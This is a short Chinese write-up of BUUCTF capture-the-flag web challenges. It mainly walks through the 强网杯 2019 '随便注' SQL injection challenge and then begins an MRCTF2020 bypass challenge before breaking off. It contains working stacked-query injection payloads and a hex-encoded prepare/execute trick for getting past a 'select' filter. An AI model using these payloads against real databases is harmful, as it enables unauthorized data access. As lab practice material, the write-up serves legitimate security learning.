BUUCTF WEB
0X01,[强网杯 2019]随便注
输入3时报错了,说明只有两个字符,接下来进行经典的查询环节
爆库:1';show databases;
爆表:1';show tables;
出来了两个数据库,一个一个查看
查询第一个数据库
1';show columns from words;
并没有出现和flag相关的东西,接下来查询第二个数据库
1';show columns from ‘1919810931114514’;
查询结果出来了flag字符,对这个flag,没有办法查看,只能借助别人的wp了,对大佬膜拜!
因为select被过滤了,所以先将select * from 1919810931114514进行16进制编码
再通过构造payload得
1;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
得到了flag;
0x02,[MRCTF2020]Ez_bypass
F12查看源代码
I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxx